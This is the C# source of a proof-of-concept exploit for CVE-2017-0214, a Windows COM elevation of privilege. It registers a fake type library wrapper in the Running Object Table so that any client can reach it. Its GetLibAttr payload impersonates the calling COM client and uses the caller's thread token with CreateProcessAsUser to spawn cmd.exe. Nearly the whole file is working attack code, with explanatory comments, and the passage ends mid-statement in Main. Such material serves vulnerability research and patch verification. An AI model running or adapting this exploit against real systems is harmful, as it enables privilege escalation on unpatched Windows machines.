CVE-2017-0214 PoC

using Microsoft.Win32.SafeHandles;
using MSSITLB;
using System;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.ConstrainedExecution;
using System.Runtime.InteropServices;
using System.Runtime.InteropServices.ComTypes;
using System.Runtime.Versioning;
using System.Security;
using System.Security.Permissions;
using System.Security.Principal;
using System.Text;
using IS = System.Runtime.InteropServices;

// Proof-of-concept for CVE-2017-0214 (per the page title). The process registers a
// logging ITypeLib wrapper in the Running Object Table under a file moniker, byte-locks
// the type library file, and repeatedly launches itself in "-x" mode. The wrapper's
// GetLibAttr member carries the payload (see TypeLibWrapper.GetLibAttr). The code is a
// developer snapshot: hard-coded local paths, unused locals and commented-out history
// are left as found.
namespace PoC_RotRegistrationEoP
{
    /// <summary>Helpers shared by the two wrapper classes.</summary>
    static class Utils
    {
        // "I_"-prefixed rpcrt4 export, i.e. an internal RPC runtime API rather than a
        // documented one. Returns 0 (RPC_S_OK) on success.
        [IS.DllImport("rpcrt4.dll")]
        static extern int I_RpcBindingInqLocalClientPID(IntPtr ClientBinding, out int ClientPID);

        /// <summary>
        /// Returns the PID of the local RPC/COM client of the call being serviced, or -1
        /// when the query fails. Passing IntPtr.Zero as the binding presumably selects the
        /// binding of the current call — confirm; outside a call this is expected to fail.
        /// </summary>
        public static int GetRpcPid()
        {
            int pid;
            if (I_RpcBindingInqLocalClientPID(IntPtr.Zero, out pid) == 0)
            {
                return pid;
            }
            return -1;
        }
    }

    /// <summary>
    /// Logging pass-through over an ITypeInfo2. Every member prints the calling PID and the
    /// member name to the console and then forwards to the wrapped object. The two members
    /// that hand out further type objects (GetContainingTypeLib, GetRefTypeInfo) re-wrap
    /// their results so the logging follows the caller as it navigates the type library.
    /// </summary>
    [IS.ComVisible(true)]
    class TypeInfoWrapper : ITypeInfo2, ITypeInfo
    {
        private ITypeInfo2 _type_info;

        public TypeInfoWrapper(ITypeInfo2 type_info)
        {
            _type_info = type_info;
        }

        // The cast throws InvalidCastException if the object does not also implement ITypeInfo2.
        public TypeInfoWrapper(ITypeInfo type_info)
            : this((ITypeInfo2)type_info)
        {
        }

        public void AddressOfMember(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, out IntPtr ppv)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.AddressOfMember(memid, invKind, out ppv);
        }

        public void CreateInstance(object pUnkOuter, ref Guid riid, out object ppvObj)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.CreateInstance(pUnkOuter, ref riid, out ppvObj);
        }

        public void GetAllCustData(IntPtr pCustData)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetAllCustData(pCustData);
        }

        public void GetAllFuncCustData(int index, IntPtr pCustData)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetAllFuncCustData(index, pCustData);
        }

        public void GetAllImplTypeCustData(int index, IntPtr pCustData)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetAllImplTypeCustData(index, pCustData);
        }

        public void GetAllParamCustData(int indexFunc, int indexParam, IntPtr pCustData)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetAllParamCustData(indexFunc, indexParam, pCustData);
        }

        public void GetAllVarCustData(int index, IntPtr pCustData)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetAllVarCustData(index, pCustData);
        }

        // Re-wraps the containing library so its members are logged too.
        public void GetContainingTypeLib(out ITypeLib ppTLB, out int pIndex)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            ITypeLib type_lib;
            _type_info.GetContainingTypeLib(out type_lib, out pIndex);
            ppTLB = new TypeLibWrapper(type_lib);
        }

        public void GetCustData(ref Guid guid, out object pVarVal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetCustData(ref guid, out pVarVal);
        }

        public void GetDllEntry(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, IntPtr pBstrDllName, IntPtr pBstrName, IntPtr pwOrdinal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetDllEntry(memid, invKind, pBstrDllName, pBstrName, pwOrdinal);
        }

        public void GetDocumentation(int index, out string strName, out string strDocString, out int dwHelpContext, out string strHelpFile)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetDocumentation(index, out strName, out strDocString, out dwHelpContext, out strHelpFile);
        }

        public void GetDocumentation2(int memid, out string pbstrHelpString, out int pdwHelpStringContext, out string pbstrHelpStringDll)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetDocumentation2(memid, out pbstrHelpString, out pdwHelpStringContext, out pbstrHelpStringDll);
        }

        public void GetFuncCustData(int index, ref Guid guid, out object pVarVal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetFuncCustData(index, ref guid, out pVarVal);
        }

        public void GetFuncDesc(int index, out IntPtr ppFuncDesc)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetFuncDesc(index, out ppFuncDesc);
        }

        public void GetFuncIndexOfMemId(int memid, System.Runtime.InteropServices.ComTypes.INVOKEKIND invKind, out int pFuncIndex)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetFuncIndexOfMemId(memid, invKind, out pFuncIndex);
        }

        public void GetIDsOfNames(string[] rgszNames, int cNames, int[] pMemId)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetIDsOfNames(rgszNames, cNames, pMemId);
        }

        public void GetImplTypeCustData(int index, ref Guid guid, out object pVarVal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetImplTypeCustData(index, ref guid, out pVarVal);
        }

        public void GetImplTypeFlags(int index, out System.Runtime.InteropServices.ComTypes.IMPLTYPEFLAGS pImplTypeFlags)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetImplTypeFlags(index, out pImplTypeFlags);
        }

        public void GetMops(int memid, out string pBstrMops)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetMops(memid, out pBstrMops);
        }

        public void GetNames(int memid, string[] rgBstrNames, int cMaxNames, out int pcNames)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetNames(memid, rgBstrNames, cMaxNames, out pcNames);
        }

        public void GetParamCustData(int indexFunc, int indexParam, ref Guid guid, out object pVarVal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetParamCustData(indexFunc, indexParam, ref guid, out pVarVal);
        }

        // Re-wraps the referenced type info so its members are logged too.
        public void GetRefTypeInfo(int hRef, out ITypeInfo ppTI)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            ITypeInfo type_info;
            _type_info.GetRefTypeInfo(hRef, out type_info);
            ppTI = new TypeInfoWrapper(type_info);
        }

        public void GetRefTypeOfImplType(int index, out int href)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetRefTypeOfImplType(index, out href);
        }

        public void GetTypeAttr(out IntPtr ppTypeAttr)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetTypeAttr(out ppTypeAttr);
        }

        public void GetTypeComp(out ITypeComp ppTComp)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetTypeComp(out ppTComp);
        }

        public void GetTypeFlags(out int pTypeFlags)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetTypeFlags(out pTypeFlags);
        }

        public void GetTypeKind(out System.Runtime.InteropServices.ComTypes.TYPEKIND pTypeKind)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetTypeKind(out pTypeKind);
        }

        public void GetVarCustData(int index, ref Guid guid, out object pVarVal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetVarCustData(index, ref guid, out pVarVal);
        }

        public void GetVarDesc(int index, out IntPtr ppVarDesc)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetVarDesc(index, out ppVarDesc);
        }

        public void GetVarIndexOfMemId(int memid, out int pVarIndex)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.GetVarIndexOfMemId(memid, out pVarIndex);
        }

        public void Invoke(object pvInstance, int memid, short wFlags, ref System.Runtime.InteropServices.ComTypes.DISPPARAMS pDispParams, IntPtr pVarResult, IntPtr pExcepInfo, out int puArgErr)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.Invoke(pvInstance, memid, wFlags, ref pDispParams, pVarResult, pExcepInfo, out puArgErr);
        }

        public void ReleaseFuncDesc(IntPtr pFuncDesc)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.ReleaseFuncDesc(pFuncDesc);
        }

        public void ReleaseTypeAttr(IntPtr pTypeAttr)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.ReleaseTypeAttr(pTypeAttr);
        }

        public void ReleaseVarDesc(IntPtr pVarDesc)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _type_info.ReleaseVarDesc(pVarDesc);
        }
    }

    /// <summary>
    /// Managed mirror of the Win32 PROCESS_INFORMATION block. Not referenced by the visible
    /// code; TypeLibWrapper.CreateProcessAsUser below uses the ProcessInformation struct instead.
    /// </summary>
    [StructLayout(LayoutKind.Sequential)]
    internal class PROCESS_INFORMATION
    {
        // The handles in PROCESS_INFORMATION are initialized in unmanaged functions.
        // We can't use SafeHandle here because Interop doesn't support [out] SafeHandles in structures/classes yet.
        public IntPtr hProcess = IntPtr.Zero;
        public IntPtr hThread = IntPtr.Zero;
        public int dwProcessId = 0;
        public int dwThreadId = 0;
        // Note this class makes no attempt to free the handles
        // Use InitialSetHandle to copy to handles into SafeHandles
    }

    /// <summary>
    /// Logging pass-through over an ITypeLib2 (same pattern as TypeInfoWrapper), with one
    /// exception: GetLibAttr is the PoC payload and performs process and token operations
    /// before forwarding. GetTypeInfo and GetTypeInfoOfGuid re-wrap their results in
    /// TypeInfoWrapper. The class also hosts the P/Invoke declarations the payload needs.
    /// </summary>
    [IS.ComVisible(true)]
    class TypeLibWrapper : ITypeLib2, ITypeLib
    {
        [DllImport("ole32.dll", ExactSpelling = true, PreserveSig = false)]
        [return: MarshalAs(UnmanagedType.Interface)]
        static extern object CoGetCallContext([In, MarshalAs(UnmanagedType.LPStruct)] Guid riid);

        // Same value as the [Guid] on the IServerSecurity interface declared below.
        Guid gd = new Guid("{0000013E-0000-0000-C000-000000000046}");

        private ITypeLib2 _tlb;

        public TypeLibWrapper(ITypeLib2 tlb)
        {
            _tlb = tlb;
        }

        // The cast throws InvalidCastException if the object does not also implement ITypeLib2.
        public TypeLibWrapper(ITypeLib tlb)
            : this((ITypeLib2)tlb)
        {
        }

        [IS.DllImport("oleaut32.dll", CharSet = IS.CharSet.Unicode, PreserveSig = false)]
        static extern ITypeLib LoadTypeLib(string strTypeLibName);

        /// <summary>
        /// Loads a real type library from disk to forward to. The try/catch only rethrows and
        /// <c>int a = 0;</c> is a leftover, so the block has no effect beyond the load itself.
        /// </summary>
        public TypeLibWrapper(string typelibname)
        {
            try
            {
                _tlb = (ITypeLib2)LoadTypeLib(typelibname);
                int a = 0;
            }
            catch (Exception)
            {
                throw;
            }
        }

        public void FindName(string szNameBuf, int lHashVal, ITypeInfo[] ppTInfo, int[] rgMemId, ref short pcFound)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.FindName(szNameBuf, lHashVal, ppTInfo, rgMemId, ref pcFound);
        }

        public void GetAllCustData(IntPtr pCustData)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetAllCustData(pCustData);
        }

        public void GetCustData(ref Guid guid, out object pVarVal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetCustData(ref guid, out pVarVal);
        }

        public void GetDocumentation(int index, out string strName, out string strDocString, out int dwHelpContext, out string strHelpFile)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetDocumentation(index, out strName, out strDocString, out dwHelpContext, out strHelpFile);
        }

        public void GetDocumentation2(int index, out string pbstrHelpString, out int pdwHelpStringContext, out string pbstrHelpStringDll)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetDocumentation2(index, out pbstrHelpString, out pdwHelpStringContext, out pbstrHelpStringDll);
        }

        // ---- P/Invoke surface used by GetLibAttr ----------------------------------------

        internal const String ADVAPI32 = "advapi32.dll";
        internal const String KERNEL32 = "kernel32.dll";

        // Declared against OpenThreadToken; the managed name differs from the entry point.
        [DllImport(ADVAPI32, SetLastError = true, EntryPoint = "OpenThreadToken")]
        [ResourceExposure(ResourceScope.None)]
        internal static extern bool
        OpenCurrentThreadToken(
            [In] IntPtr ThreadHandle,
            [In] TokenAccessLevels DesiredAccess,
            [In] bool OpenAsSelf,
            [Out] out IntPtr TokenHandle);

        [DllImport(KERNEL32, SetLastError = true)]
        [ResourceExposure(ResourceScope.None)]
        internal static extern IntPtr
        GetCurrentThread();

        internal enum SECURITY_IMPERSONATION_LEVEL
        {
            Anonymous = 0,
            Identification = 1,
            Impersonation = 2,
            Delegation = 3,
        }

        [Serializable]
        internal enum TokenTypeVal : int
        {
            TokenPrimary = 1,
            TokenImpersonation
        }

        [ReliabilityContract(Consistency.WillNotCorruptState, Cer.MayFail)]
        [DllImport(ADVAPI32, CharSet = CharSet.Auto, SetLastError = true)]
        [ResourceExposure(ResourceScope.None)]
        internal static extern
        bool DuplicateTokenEx(
            [In]     IntPtr ExistingTokenHandle,
            [In]     TokenAccessLevels DesiredAccess,
            [In]     IntPtr TokenAttributes,
            [In]     SECURITY_IMPERSONATION_LEVEL ImpersonationLevel,
            [In]     TokenTypeVal TokenType,
            [In, Out] ref IntPtr DuplicateTokenHandle);

        [DllImport(ADVAPI32, CharSet = System.Runtime.InteropServices.CharSet.Auto, SetLastError = true, BestFitMapping = false)]
        [System.Security.SuppressUnmanagedCodeSecurityAttribute()]
        [ResourceExposure(ResourceScope.Machine)]
        public extern static bool CreateProcessAsUser(IntPtr hToken, String lpApplicationName, String lpCommandLine, ref SecurityAttributes lpProcessAttributes,
            ref SecurityAttributes lpThreadAttributes, bool bInheritHandle, int dwCreationFlags, IntPtr lpEnvironment,
            String lpCurrentDirectory, ref StartupInfo lpStartupInfo, out ProcessInformation lpProcessInformation);

        [StructLayout(LayoutKind.Sequential)]
        public struct StartupInfo
        {
            public int cb;
            public String lpReserved;
            public String lpDesktop;
            public String lpTitle;
            public uint dwX;
            public uint dwY;
            public uint dwXSize;
            public uint dwYSize;
            public uint dwXCountChars;
            public uint dwYCountChars;
            public uint dwFillAttribute;
            public uint dwFlags;
            public short wShowWindow;
            public short cbReserved2;
            public IntPtr lpReserved2;
            public IntPtr hStdInput;
            public IntPtr hStdOutput;
            public IntPtr hStdError;
        }

        [StructLayout(LayoutKind.Sequential)]
        public struct ProcessInformation
        {
            public IntPtr hProcess;
            public IntPtr hThread;
            public uint dwProcessId;
            public uint dwThreadId;
        }

        [StructLayout(LayoutKind.Sequential)]
        public struct SecurityAttributes
        {
            public int Length;
            public IntPtr lpSecurityDescriptor;
            public bool bInheritHandle;
        }

        [DllImport("ole32.dll")]
        static extern int CoQueryClientBlanket(out IntPtr pAuthnSvc, out IntPtr pAuthzSvc,
            [MarshalAs(UnmanagedType.LPWStr)] out StringBuilder pServerPrincName, out IntPtr
            pAuthnLevel, out IntPtr pImpLevel, out IntPtr pPrivs, out IntPtr pCapabilities);

        /// <summary>
        /// The payload member. Before the final forwarding call it does things no caller of
        /// ITypeLib::GetLibAttr expects from a type library: it starts cmd.exe unconditionally,
        /// impersonates the COM caller via IServerSecurity, opens the thread token while
        /// impersonating, and starts a second cmd.exe through CreateProcessAsUser with that
        /// token. From a detection standpoint the observable is a process holding a ROT
        /// registration that spawns cmd.exe from inside a COM call; none of the Win32 return
        /// values are acted upon and the thread is never reverted with RevertToSelf.
        /// </summary>
        public void GetLibAttr(out IntPtr ppTLibAttr)
        {
            // First shell, started in the server's own context before anything is inspected.
            System.Diagnostics.Process.Start(@"C:\Windows\System32\cmd.exe");
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            Console.WriteLine("firstShoot");
            IntPtr threadPtr1 = IntPtr.Zero;
            IntPtr threadPtr23 = IntPtr.Zero;
            IntPtr threadPtr3 = IntPtr.Zero;
            IntPtr threadPtr4 = IntPtr.Zero;
            IntPtr threadPtr5 = IntPtr.Zero;
            IntPtr threadPtr6 = IntPtr.Zero;
            StringBuilder sb = new StringBuilder();
            // Caller's security blanket; the principal name copied into `s` is never used.
            CoQueryClientBlanket(out threadPtr1, out threadPtr23, out sb, out threadPtr3, out threadPtr4, out threadPtr5, out threadPtr6);
            string s = sb.ToString();
            // Thread token before impersonation, printed only for comparison.
            IntPtr tokenHandle = IntPtr.Zero;
            IntPtr threadPtr = GetCurrentThread();
            bool isSuccess = OpenCurrentThreadToken(threadPtr, TokenAccessLevels.Query, true, out tokenHandle);
            Console.WriteLine("threadPtr1is:" + tokenHandle);
            // Call context for the in-flight COM call; the HRESULT in `a` is not checked.
            IServerSecurity pss = CoGetCallContext(gd) as IServerSecurity;
            int a = pss.ImpersonateClient();
            // Thread token while impersonating the caller.
            IntPtr tokenHandle2 = IntPtr.Zero;
            IntPtr threadPtr2 = GetCurrentThread();
            isSuccess = OpenCurrentThreadToken(threadPtr2, TokenAccessLevels.Query, true, out tokenHandle2);
            Console.WriteLine("threadPtr2is:" + tokenHandle2);
            IntPtr hToken2 = IntPtr.Zero;
            var sa = new SecurityAttributes { bInheritHandle = false };
            sa.Length = Marshal.SizeOf(sa);
            isSuccess = DuplicateTokenEx(tokenHandle2, TokenAccessLevels.MaximumAllowed, IntPtr.Zero, SECURITY_IMPERSONATION_LEVEL.Identification, TokenTypeVal.TokenPrimary, ref hToken2);
            Console.WriteLine("DuplicateTokenEx:" + tokenHandle + "err:" + Marshal.GetLastWin32Error());
            sa.lpSecurityDescriptor = (IntPtr)0;
            var si = new StartupInfo();
            si.cb = Marshal.SizeOf(si);
            si.lpDesktop = "";
            // ReSharper disable once RedundantAssignment
            var pi = new ProcessInformation();
            // Second shell, launched with the token opened while impersonating.
            isSuccess = CreateProcessAsUser(tokenHandle2, "cmd.exe", @"C:\Windows\System32\cmd.exe", ref sa, ref sa, false, 0, (IntPtr)0, "C:\\", ref si, out pi);
            Console.WriteLine("CreateProcessAsUser:" + isSuccess);
            //IntPtr pwz = IntPtr.Zero;
            //IntPtr pwz2 = IntPtr.Zero;
            //pss.QueryBlanket(IntPtr.Zero, IntPtr.Zero, pwz, IntPtr.Zero, IntPtr.Zero, pwz2, IntPtr.Zero);
            //string s = Marshal.PtrToStringAuto(pwz);
            //string s2 = Marshal.PtrToStringAuto(pwz2);
            //System.Diagnostics.Process p = new System.Diagnostics.Process();
            //p.StartInfo.FileName = @"cmd.exe";
            //p.StartInfo.WindowStyle = ProcessWindowStyle.Normal;
            //p.Start(); // start the program
            //p.WaitForExit();
            // Forward to the real type library as every other member does.
            _tlb.GetLibAttr(out ppTLibAttr);
            return;
        }

        public void GetLibStatistics(IntPtr pcUniqueNames, out int pcchUniqueNames)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetLibStatistics(pcUniqueNames, out pcchUniqueNames);
        }

        public void GetTypeComp(out ITypeComp ppTComp)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetTypeComp(out ppTComp);
        }

        // Re-wraps the type info so its members are logged too.
        public void GetTypeInfo(int index, out ITypeInfo ppTI)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            ITypeInfo type_info;
            _tlb.GetTypeInfo(index, out type_info);
            ppTI = new TypeInfoWrapper(type_info);
        }

        public int GetTypeInfoCount()
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            return _tlb.GetTypeInfoCount();
        }

        // Re-wraps the type info so its members are logged too.
        public void GetTypeInfoOfGuid(ref Guid guid, out ITypeInfo ppTInfo)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            ITypeInfo type_info;
            _tlb.GetTypeInfoOfGuid(ref guid, out type_info);
            ppTInfo = new TypeInfoWrapper(type_info);
        }

        public void GetTypeInfoType(int index, out System.Runtime.InteropServices.ComTypes.TYPEKIND pTKind)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.GetTypeInfoType(index, out pTKind);
        }

        public bool IsName(string szNameBuf, int lHashVal)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            return _tlb.IsName(szNameBuf, lHashVal);
        }

        public void ReleaseTLibAttr(IntPtr pTLibAttr)
        {
            Console.WriteLine("{0} - {1}", Utils.GetRpcPid(), MethodInfo.GetCurrentMethod().Name);
            _tlb.ReleaseTLibAttr(pTLibAttr);
        }
    }

    /// <summary>
    /// Coclass activated by the "-x" child mode. Its implementation is not on this page;
    /// presumably it lives in the testalt component the hard-coded paths point at — confirm.
    /// </summary>
    [ComImport]
    [Guid("26D6311A-A724-4C8C-B83A-2E60ECD47480")]
    public class mytestcom
    {
    }

    /// <summary>Interface of mytestcom; not called by any live code on this page.</summary>
    [ComImport]
    [Guid("E80A6EC1-39FB-462A-A56C-411EE9FC1AEB")]
    public interface Imytestcom
    {
        void mdtest();
    }

    /// <summary>
    /// Hand-declared IServerSecurity (COM call-context interface). Only ImpersonateClient is
    /// used by this file; QueryBlanket is declared with raw IntPtr parameters.
    /// </summary>
    [ComImport,
      Guid("0000013E-0000-0000-C000-000000000046"),
      InterfaceType(ComInterfaceType.InterfaceIsIUnknown)]
    internal interface IServerSecurity
    {
        void QueryBlanket
        (
            IntPtr authnSvc,
            IntPtr authzSvc,
            IntPtr serverPrincipalName,
            IntPtr authnLevel,
            IntPtr impLevel,
            IntPtr clientPrincipalName,
            IntPtr Capabilities
        );
        [PreserveSig]
        int ImpersonateClient();
        [PreserveSig]
        int RevertToSelf();
        [PreserveSig]
        [return: MarshalAs(UnmanagedType.Bool)]
        bool IsImpersonating();
    }

    /// <summary>
    /// Entry point. Two modes: with "-x" the process only activates the mytestcom CLSID
    /// (child role); with any other argument it becomes the server that registers
    /// TypeLibWrapper in the Running Object Table and drives the child in a loop.
    /// </summary>
    class Program
    {
        const String OLEAUT32 = "oleaut32.dll";

        // Declared but only referenced from commented-out code.
        [DllImport(OLEAUT32,
         ExactSpelling = true,
         CharSet = CharSet.Unicode,
         PreserveSig = true)]
        [ResourceExposure(ResourceScope.None)]
        internal static extern int LoadRegTypeLib(ref Guid rguid, ushort major, ushort minor, int lcid,
            [MarshalAs(UnmanagedType.Interface)] out object typeLib);

        const int RPC_C_AUTHN_LEVEL_DEFAULT = 0;
        const int RPC_C_IMP_LEVEL_IMPERSONATE = 3;
        // With EOAC_APPID, CoInitializeSecurity's first argument is read as an AppID GUID.
        const int EOAC_APPID = 8;

        [IS.DllImport("ole32.dll")]
        static extern int CoInitializeSecurity(
            ref Guid pSecDesc,
            int cAuthSvc,
            IntPtr asAuthSvc,
            IntPtr pReserved1,
            int dwAuthnLevel,
            int dwImpLevel,
            IntPtr pAuthList,
            int dwCapabilities,
            IntPtr pReserved3
            );

        [return: IS.MarshalAs(IS.UnmanagedType.Interface)]
        [IS.DllImport("ole32.dll", CharSet = IS.CharSet.Unicode, ExactSpelling = true, PreserveSig = false)]
        static extern IMoniker CreateFileMoniker(string lpszPathName);

        [return: IS.MarshalAs(IS.UnmanagedType.Interface)]
        [IS.DllImport("ole32.dll", CharSet = IS.CharSet.Unicode, ExactSpelling = true, PreserveSig = false)]
        static extern IRunningObjectTable GetRunningObjectTable(int reserved);

        const int ROTFLAGS_ALLOWANYCLIENT = 2;
        const int ROTFLAGS_REGISTRATIONKEEPSALIVE = 1;
        // Only referenced from commented-out code.
        static Guid tapi3guid = new Guid("{21D6D480-A88B-11D0-83DD-00AA003CCABD}");

        /// <summary>
        /// Usage: "fake_typelib" (any non "-x" argument) runs the server role; "-x" runs the
        /// child role. Every exception is printed and the process waits for a key press.
        /// </summary>
        [MTAThread]
        static void Main(string[] args)
        {
            try
            {
                // (new mytestcom() as Imytestcom).mdtest();
                //byte[] bs = File.ReadAllBytes(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "tapi3.dll"));
                //  File.WriteAllBytes("c:\\123\\1.raw",bs);
                if (args.Length < 1)
                {
                    Console.WriteLine("Usage: fake_typelib|-x");
                    return;
                }
                if (args[0] == "-x")
                {
                    // Child role: activate the mytestcom coclass out of process. Presumably
                    // that activation is what ends up calling into the ROT-registered wrapper
                    // in the parent — confirm against the testalt component.
                    //Console.WriteLine("Running PoC");
                    //Type t = Type.GetTypeFromCLSID(new Guid("9E175B68-F52A-11D8-B9A5-505054503030"));
                    //IGatherManagerAdmin2 mgr = (IGatherManagerAdmin2)Activator.CreateInstance(t);
                    //mgr.GetBackoffReason(0x12345678);
                    Type t = Type.GetTypeFromCLSID(new Guid("26D6311A-A724-4C8C-B83A-2E60ECD47480"));
                    Activator.CreateInstance(t);
                    // (new mytestcom() as Imytestcom).mdtest();
                }
                else
                {
                    // Server role.
                    //modified version
                    string tlb_path = "C:\\project\\testalt\\Debug\\testalt.dll";
                    // string tlb_path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.System), "tapi3.dll");
                    //  Guid appid = new Guid("{4584EA27-6431-483D-8653-F96796E1A051}");
                    //  Guid appid = tapi3guid;
                    //newly generated guid
                    //  Guid appid = new Guid("{4584EA27-6431-483D-8653-F96796E1A051}");
                    Guid appid = new Guid("{3E5F704C-C0ED-491C-9BB5-EA1EAD8B31B7}");
                    //old
                    // Guid appid = new Guid("{d056ebce-e7e9-4994-a5e6-de59430306c1}");
                    //
                    // Process-wide COM security keyed to the AppID above (EOAC_APPID).
                    int hr = CoInitializeSecurity(ref appid, -1, IntPtr.Zero, IntPtr.Zero,
                        RPC_C_AUTHN_LEVEL_DEFAULT, RPC_C_IMP_LEVEL_IMPERSONATE, IntPtr.Zero, EOAC_APPID, IntPtr.Zero);
                    if (hr != 0)
                    {
                        IS.Marshal.ThrowExceptionForHR(hr);
                    }
                    // Note the wrapper loads a different file than the one the moniker names
                    // (tlb_path); both are hard-coded developer paths.
                    TypeLibWrapper tlb = new TypeLibWrapper("C:\\123\\sys\\testalt.dll");
                    IMoniker moniker = CreateFileMoniker(tlb_path);
                    IRunningObjectTable rot = GetRunningObjectTable(0);
                    // ROTFLAGS_ALLOWANYCLIENT exposes the registration to any client, so a
                    // consumer resolving the file moniker for tlb_path is handed this wrapper
                    // instead of the file. That registration is the behaviour CVE-2017-0214
                    // is about (inferred from the namespace name RotRegistrationEoP); the
                    // vendor fix for that CVE is the mitigation.
                    int flags = ROTFLAGS_ALLOWANYCLIENT | ROTFLAGS_REGISTRATIONKEEPSALIVE;
                    // int flags = 0;
                    int cookie = rot.Register(flags, tlb, moniker);
                    byte[] bts = new byte[4096];
                    //  (new mytestcom() as Imytestcom).mdtest();
                    Console.ReadKey();
                    // Hold a byte-range lock on the first 4096 bytes of the type library file
                    // for as long as the loop below runs.
                    using (FileStream stm = new FileStream(tlb_path, FileMode.Open, FileAccess.Read, FileShare.Read | FileShare.Delete))
                    {
                        stm.Lock(0, 4096);
                        Console.WriteLine("Waiting");
